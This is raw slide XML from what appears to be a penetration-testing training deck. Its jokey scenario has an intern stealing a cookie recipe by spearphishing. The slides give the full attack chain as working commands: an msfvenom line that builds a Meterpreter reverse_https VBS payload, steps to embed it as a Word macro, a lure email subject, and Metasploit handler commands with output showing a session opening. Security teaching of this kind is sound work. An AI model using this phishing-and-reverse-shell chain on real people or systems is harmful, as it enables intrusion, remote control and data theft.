      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B34E668-2FB6-433E-94EA-92463F633E69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2057400"/>
            <a:ext cx="10512424" cy="3826042"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273021947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7D9B14-FFD6-4D39-B7F3-F5D9A9995343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926432" y="196850"/>
            <a:ext cx="4754896" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Test Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D931C1B1-A1E3-43B7-9CFA-1BD56913EBEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926432" y="2057400"/>
            <a:ext cx="10428956" cy="3803650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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You’re an unpaid intern working for the National Cookie Company and you want to steal Grandma’s newest secret cookie recipe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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You purchase a cloud server host in the North Pole using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SugarCoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> to act as your launch pad for your evil plan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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Through some open source research you find out that the United Chocolate Chip Corporation (UCCC) had a recent compromise and the gang leaked many of their sensitive corporate documents on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pastrybin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, the anonymous bulletin board website. In the dump you stumble across some internal network diagrams for the National Cookie Company. In these diagrams you discover that Grandma keeps her recipe on a hardened database server. This server is behind a firewall that will only communicate with Grandma’s workstation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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You continue your research and review some of the PR releases on the National Cookie Company’s website. In there you realize that Grandma is also one of the main ambassadors for the National Diabetes Association. You start to draft up some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spearphishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> emails using this discovery to pique Grandma’s interest. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26173464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7D9B14-FFD6-4D39-B7F3-F5D9A9995343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926432" y="196850"/>
            <a:ext cx="4754896" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Test Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D931C1B1-A1E3-43B7-9CFA-1BD56913EBEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336883" y="2057399"/>
            <a:ext cx="11622505" cy="4235117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># generate malicious word document using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> LHOST=192.168.30.15 LPORT=443 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -o /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/reverse_https.vbs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># Microsoft Word, New Document, View-&gt;Macros, Create macro, paste in payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47AF02D2-18EE-4017-8878-79348F124545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="794991" y="3729790"/>
            <a:ext cx="2923063" cy="2361939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33673480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7D9B14-FFD6-4D39-B7F3-F5D9A9995343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926432" y="196850"/>
            <a:ext cx="4754896" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Test Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D931C1B1-A1E3-43B7-9CFA-1BD56913EBEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336883" y="2057399"/>
            <a:ext cx="11622505" cy="4235117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># send to grandma’s email, Subject: ‘New Lower Calorie Chocolate Chips!’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># listen for reverse connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf6 &gt; use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf6 exploit(multi/handler) &gt; set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf6 exploit(multi/handler) &gt; set LHOST 0.0.0.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf6 exploit(multi/handler) &gt; set LPORT 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf6 exploit(multi/handler) &gt; run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Started HTTPS reverse handler on https://0.0.0.0:443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] https://0.0.0.0:443 handling request from 192.168.30.18; (UUID: ibyv0xlb) Staging x86 payload (176220 bytes) ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Meterpreter session 1 opened (192.168.30.15:443 -&gt; 127.0.0.1) at 2022-02-15 16:32:33 -0500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
